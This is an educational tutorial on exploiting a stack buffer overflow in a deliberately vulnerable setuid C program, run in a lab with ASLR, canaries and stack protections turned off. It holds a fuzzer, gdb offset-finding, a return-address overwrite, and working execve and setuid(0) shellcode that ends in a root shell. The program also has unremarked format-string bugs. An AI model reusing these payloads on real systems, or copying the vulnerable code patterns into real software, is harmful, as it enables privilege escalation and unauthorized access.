Plain Buffer Overflow [Fully Explained]
This is the first in a series of tutorials exploring how to detect and exploit stack-based vulnerabilities on x86-32 Linux systems. As the first, it covers detecting and exploiting a buffer overflow on a system with no protections in place. Modern protections will be explored in future tutorials, but it’s important to understand the basics before taking on more complex situations.
A buffer overflow happens when a programmer has not done sufficient bounds checking before or while copying the contents of one buffer into another. A buffer is normally a local array (on the stack) or memory obtained from a dynamic memory allocation function (on the heap). We will concentrate on stack-based buffer overflows at first, as they are much easier for beginners to understand.
All of the code in this tutorial was written by the author.
The Vulnerable App:
Below is the source code of the vulnerable application that we will be attacking. It is written in C.
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"
#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }

    r = checkpass(argv[1]);

    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }

    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;

    strncpy(p, a, strlen(a)+1);
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;

    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            putchar(c);
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}
The Fix:
The code in the above application that is vulnerable to a stack-based buffer overflow is the strncpy(p, a, strlen(a)+1); call in checkpass. Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer p as strlen(a)+1. This calculation is based on the length of the input provided by the user, so it is controlled by the user rather than by the size of p. To fix this vulnerability, the call should be changed to strncpy(p, a, sizeof(p)-1); or strncpy(p, a, 511);. We subtract 1 byte to leave space for the terminating null character '\0'. Note that strncpy does not write that terminator itself when the input is 511 bytes or longer, so the call should be followed by p[sizeof(p)-1] = '\0';. For more information about strncpy see man strncpy.
Setting Up The Environment:
This is how to set up the environment in full on a Debian-based system:
root@dev:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n]
root@dev:~# ls
app.c
root@dev:~# gcc -z execstack -fno-stack-protector -o app app.c
root@dev:~# cp app /home/testuser/
root@dev:~# cat /proc/sys/kernel/randomize_va_space
2
root@dev:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@dev:~# cat /proc/sys/kernel/randomize_va_space
0
root@dev:~# cd /home/testuser/
root@dev:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# chmod u+s app
root@dev:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt
root@dev:/home/testuser# chmod 600 secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@dev:/home/testuser# su - testuser
testuser@dev:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@dev:~$ ls -l secret.txt
-rw------- 1 root root 91 May 9 13:40 secret.txt
testuser@dev:~$ cat secret.txt
cat: secret.txt: Permission denied
So our environment is set up and ready for exploit development. First a user, testuser, is added to run the application as. The application is then compiled with gcc using -z execstack, which marks the stack as executable, and -fno-stack-protector, which disables stack canaries. Writing 0 to /proc/sys/kernel/randomize_va_space disables ASLR, and chmod u+s sets the setuid bit so that the application runs with root privileges (which is required to read secret.txt, created with the echo command and restricted with chmod 600). Lastly, the final cat as testuser confirms that the file is not readable by the user that runs the application.
Testing App and Finding Vulnerability:
First we need to use the application to figure out its inputs and see how the application acts normally:
testuser@dev:~$ ./app
Usage: ./app <password>
testuser@dev:~$ ./app test
Wrong password: test
testuser@dev:~$ echo $?
1
As we can see, when we enter the wrong password the application’s exit code is 1. Let’s try fuzzing this input to look for a buffer overflow. Here is a simple Python script that can do that:
#!/usr/bin/env python
from subprocess import Popen, PIPE

count = 0  # store the number of A's that caused a crash
for i in range(5000):  # loop through the numbers from 0 to 4999
    # execute the file ./app with the argument "A"*i so we keep
    # increasing the number of A's by 1
    process = Popen(["./app", "A"*i], stdin=PIPE, stdout=PIPE)
    (output, err) = process.communicate()
    exit_code = process.wait()  # wait for the program's exit code
    if exit_code != 1:  # anything other than "wrong password"
        count = i  # set the count to i
        break  # and break out of the loop
print(count)  # print the number of A's it took to crash it
Running the python script gives us:
testuser@dev:~$ python app-fuzz.py
524
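The exit-code test in the script above also stops on exit code 0 (a correct password). A slightly stricter variant is sketched below in Python 3, rather than the Python 2 used elsewhere in this tutorial. It treats only a negative return code as a crash, since subprocess reports a process killed by signal N as -N. The names run_app and first_crash are made up for this sketch.

```python
import subprocess


def run_app(payload, path="./app"):
    """Run the target with one argument and return its return code.

    subprocess reports a process killed by signal N as -N, so a
    segmentation fault (SIGSEGV, signal 11) shows up as -11.
    """
    result = subprocess.run([path, payload],
                            stdout=subprocess.DEVNULL,
                            stderr=subprocess.DEVNULL)
    return result.returncode


def first_crash(run, max_len=5000):
    """Return the smallest number of A's for which run() reports a
    signal (negative return code), or None if nothing crashed."""
    for n in range(max_len):
        if run("A" * n) < 0:
            return n
    return None
```

With ./app in the current directory, first_crash(run_app) would be the call to make. Passing the runner in as a parameter keeps the search loop testable without the real binary.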
Exploiting The App:
So the Python script crashed the application by passing 524 A’s as its input. Just because we crashed the application doesn’t mean we took control of the application’s execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A’s is 524 bytes).
We will use gdb to do this. The hex value for A is 41 (you can find this in the ascii man page, man ascii), so what we are looking for is a crash where the application tries to execute code at address 0x41414141 (as this is a 32-bit system, each address is 32 bits, or 4 bytes, long).
testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 524')
Starting program: /home/testuser/app $(python -c 'print "A" * 524')
Program received signal SIGSEGV, Segmentation fault.
0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) r $(python -c 'print "A" * 528')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 528')
Program received signal SIGSEGV, Segmentation fault.
0xbffff970 in ?? ()
(gdb) r $(python -c 'print "A" * 532')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 532')
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
We increase the number of bytes by 4 each time because addresses are 4 bytes wide on a 32-bit system. So after 528 bytes of padding, the next 4 bytes hijack execution: in the last run above, the address the application is trying to execute when it crashes is 0x41414141, which is just AAAA.
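To see why a crash at 0x41414141 means our input is being used as an address, here is a small Python 3 sketch (not part of the original toolchain) showing that four A’s and the value 0x41414141 are the same four bytes.

```python
import struct

padding = b"AAAA"

# Each 'A' is the byte 0x41.
assert padding.hex() == "41414141"

# Read as a 32-bit little-endian integer, the four bytes form the
# address that gdb reported.
(address,) = struct.unpack("<I", padding)
print(hex(address))  # prints 0x41414141
```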
I’m going to show you 2 ways you can exploit this. The first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check. Again we’ll use gdb for this.
I use the -q option to gdb to suppress the informational message that it normally prints on startup. I then set the disassembly flavor to Intel format, because gdb defaults to AT&T format and I prefer Intel.
The call to printfile in the disassembly of main looks like a good choice to jump to, and it is at address 0x0804869b. All we need to do is put this address, byte-reversed because x86 is little endian, after the 528 bytes of padding. Here’s how:
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"')
This is a top secret file!
Only people with the password should be able to view this file!
Segmentation fault
We still get a segmentation fault but it outputs the contents of the file meaning we’ve circumvented the password protection.
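The byte reversal used above can be checked with a short Python 3 sketch. The helper name build_payload is hypothetical. It pads up to the offset found with gdb and appends the target address packed as a 32-bit little-endian value.

```python
import struct


def build_payload(offset, address):
    """Padding up to the saved return address, followed by the new
    return address packed as a 32-bit little-endian value."""
    return b"A" * offset + struct.pack("<I", address)


payload = build_payload(528, 0x0804869b)
print(payload[-4:])  # prints b'\x9b\x86\x04\x08'
```

Letting struct.pack do the reversal avoids hand-typing the bytes in the wrong order when the target address changes.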
Developing Shellcode/ Improving Exploitation:
Now I’m going to show you how to use this to run your own code as root. First we need some code to run. I’ve written a quick assembly application for IA-32 (in NASM syntax) which just runs the execve system call with /bin/bash as its argument (for more information on execve itself see man execve):
; run /bin/bash
global _start
section .text
_start:
jmp short Call_shellcode ; jump to where our string is
shellcode:
pop ebx ; pop the address of our string into ebx
; which is the first argument to execve
xor eax, eax ; zero out the eax register
mov [ebx +9], al ; put a 0 where the A is to null
; terminate the /bin/bash string
mov al, 0xb ; put the sys call number 11 into eax
mov [ebx +10], ebx ; put a pointer to the beginning
; of the string where the BBBB is
xor ecx, ecx ; zero out the ecx register
mov [ebx +14], ecx ; replace the CCCC with 0000
lea ecx, [ebx +10] ; load the address that used to
; point to BBBB into ecx the second
; argument to execve
lea edx, [ebx +14] ; load the address that used to
; point to CCCC into edx the third
; argument to execve
int 0x80 ; execute the syscall execve
Call_shellcode:
call shellcode ; call the start of the actual application
shell: db "/bin/bashABBBBCCCC" ; our string of
; arguments to execve
A system call works by loading the syscall number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx and edx registers respectively, and then running int 0x80 to execute the system call. To find the syscall number, do this:
testuser@dev:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve 11
This means execve is 11 or 0xb in hex.
In this shellcode I’m using the jmp-call-pop technique to get the address of the string and the list of arguments. When a call instruction executes, the address of the next instruction is pushed onto the stack; here that is the address of the string, which pop ebx then retrieves. This makes the code position independent. So we now need to extract this shellcode:
testuser@dev:~$ nasm -f elf32 -o shell.o shell.nasm
testuser@dev:~$ ld -o shell shell.o
testuser@dev:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
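As a sanity check on the jmp-call-pop layout, the two relative displacements in the extracted bytes can be decoded by hand. The following Python 3 sketch (an illustration, not part of the original workflow) follows the jmp to the call, then follows the call back to the pop, and confirms that the return address pushed by the call is the start of the /bin/bash string.

```python
import struct

shellcode = (
    b"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
    b"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
    b"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
)

# jmp short: opcode 0xeb plus a signed 8-bit displacement,
# relative to the end of the 2-byte instruction.
assert shellcode[0] == 0xEB
(jmp_disp,) = struct.unpack("b", shellcode[1:2])
call_at = 2 + jmp_disp

# call rel32: opcode 0xe8 plus a signed 32-bit displacement,
# relative to the end of the 5-byte instruction.
assert shellcode[call_at] == 0xE8
(call_disp,) = struct.unpack("<i", shellcode[call_at + 1:call_at + 5])
string_at = call_at + 5         # return address pushed by call
pop_at = string_at + call_disp  # where execution continues

print(call_at, string_at, pop_at)          # prints 26 31 2
print(shellcode[pop_at] == 0x5B)           # 0x5b is pop ebx
print(shellcode[string_at:string_at + 9])  # prints b'/bin/bash'
```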
We have shellcode now, but we should test it to make sure it works. The following C application can do that:
#include <stdio.h>
#include <string.h>

unsigned char code[] = \
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

int main()
{
    printf("Shellcode Length: %d\n", (int)strlen((char *)code));
    /* treat the array as a function and call it */
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}
I’ve split it up onto multiple lines here for readability. Compiling it and running it:
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length: 49
testuser@dev:/home/testuser$
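It worked. The shellcode application just casts the address of the code array to a function pointer and calls it, which runs our shellcode. We need this wrapper because the standalone binary crashes when run directly: the shellcode writes into its own string, which ld places in the read-only .text section: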
testuser@dev:~$ ./shell
Segmentation fault
Now we need a way to put our shellcode in memory and find its address, so that we can hijack execution of our vulnerable application with it. We can put it in an environment variable and use getenv to get its address. Here is how we put it into an environment variable, prefixed with 500 NOP bytes (\x90) so that a jump landing anywhere in that run still slides into the shellcode:
testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
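Environment variables are NUL-terminated strings, so the value must not contain a 0x00 byte. That is why the assembly zeroes registers with xor and patches the terminator in at run time. A minimal Python 3 sketch (illustrative only) that checks this property and the resulting lengths:

```python
shellcode = (
    b"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
    b"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
    b"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
)

nop_sled = b"\x90" * 500       # 0x90 is the x86 nop instruction
env_value = nop_sled + shellcode

# A NUL byte anywhere would truncate the environment variable.
assert b"\x00" not in env_value

print(len(shellcode), len(env_value))  # prints 49 549
```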
Here is another C application that we can use to get the address of an environment variable in the memory of another application:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char *ptr;

    if (argc < 3) {
        printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
        exit(0);
    }
    ptr = getenv(argv[1]); /* get env var location */
    if (ptr == NULL) { /* variable is not set */
        printf("%s is not set\n", argv[1]);
        exit(1);
    }
    ptr += (strlen(argv[0]) - strlen(argv[2]))*2; /* adjust for program name */
    printf("%s will be at %p\n", argv[1], ptr);
    return 0;
}
We compile this application and run it with the relevant arguments:
testuser@dev:~$ gcc -o getenvaddr getenvaddr.c
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff774
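The adjustment that getenvaddr applies is plain arithmetic on the two program-name lengths, and can be sketched in Python 3 as follows. The function name adjust_env_address is made up for this sketch, the factor of 2 is copied from the C program as-is, and the input address is an illustrative value chosen to match the output above, not one taken from a real run.

```python
def adjust_env_address(addr_in_helper, helper_name, target_name):
    """Mirror the pointer arithmetic in getenvaddr.c: shift the
    address seen in the helper by twice the difference between the
    two program-name lengths."""
    return addr_in_helper + (len(helper_name) - len(target_name)) * 2


# "./getenvaddr" is 12 characters and "./app" is 5, so the
# address moves up by (12 - 5) * 2 = 14 bytes.
predicted = adjust_env_address(0xbffff766, "./getenvaddr", "./app")
print(hex(predicted))  # prints 0xbffff774
```

Because the result depends on the exact name used to start each program, the target should be invoked the same way (here as ./app) when the address is used.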
Great! Nearly there. We’ve got the address of our shellcode, and now we need to use it. We will hijack the execution flow as we did before, but this time we will point it at the address of our environment variable:
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami
testuser
bash-4.2$ cat secret.txt
cat: secret.txt: Permission denied
Damn! So it didn’t work. The shell must be dropping privileges (bash resets its effective uid to the real uid when the two differ, unless it is started with -p). No need to worry, but we now need to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (root) (for more information on setuid see man setuid). First we need to find out the syscall number:
testuser@dev:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_setuid 23
#define __NR_setuid32 213
The syscall number is 23, or 0x17 in hex. Our modified shellcode is:
; run /bin/bash
global _start
section .text
_start:
jmp short Call_shellcode ; jump to where our string is
shellcode:
xor eax, eax ; zero out eax
mov al, 0x17 ; put 23 into eax to setuid
xor ebx, ebx ; zero out ebx
int 0x80 ; make the syscall setuid
mov eax, ebx ; zero out eax
pop ebx ; pop the address of our string into ebx
; which is the first argument to execve
mov [ebx +9], al ; put a 0 where the A is to null
; terminate the /bin/bash string
mov al, 0xb ; put the sys call number 11 into eax
mov [ebx +10], ebx ; put a pointer to the beginning
; of the string where the BBBB is
xor ecx, ecx ; zero out the ecx register
mov [ebx +14], ecx ; replace the CCCC with 0000
lea ecx, [ebx +10] ; load the address that used to
; point to BBBB into ecx the second
; argument to execve
lea edx, [ebx +14] ; load the address that used to
; point to CCCC into edx the third
; argument to execve
int 0x80 ; execute the syscall execve
Call_shellcode:
call shellcode ; call the start of the actual application
shell: db "/bin/bashABBBBCCCC" ; our string of
; arguments to execve
This is the same as before except I added a call to setuid before it starts setting up the call to execve. Let’s first make sure it works:
testuser@dev:~$ nasm -f elf32 -o shell2.o shell2.nasm
testuser@dev:~$ ld -o shell2 shell2.o
testuser@dev:~$ objdump -d ./shell2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
testuser@dev:~$ cat shellcode.c
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length: 57
testuser@dev:/home/testuser$
That seems to work, let’s test it out:
testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff76c
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x6c\xf7\xff\xbf"')
root@dev:/home/testuser# whoami
root
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
PWNED!!! :-D
Conclusion:
It’s very important to understand that when you are developing exploits you are always going to run into problems; that is why I left in the part where I didn’t get root access. You will fail over and over again, but if you keep trying you will find a way to hack it in the end.
This was one of the simplest examples possible, but it is important that you are able to do this before continuing. Don’t worry if you don’t understand how the application’s execution was hijacked or how the stack works. I will explain all of that in later tutorials when it is absolutely necessary; this tutorial is already long enough without going into more depth.
I hope you enjoyed reading this as much as I enjoyed writing it.
Happy Hacking :-)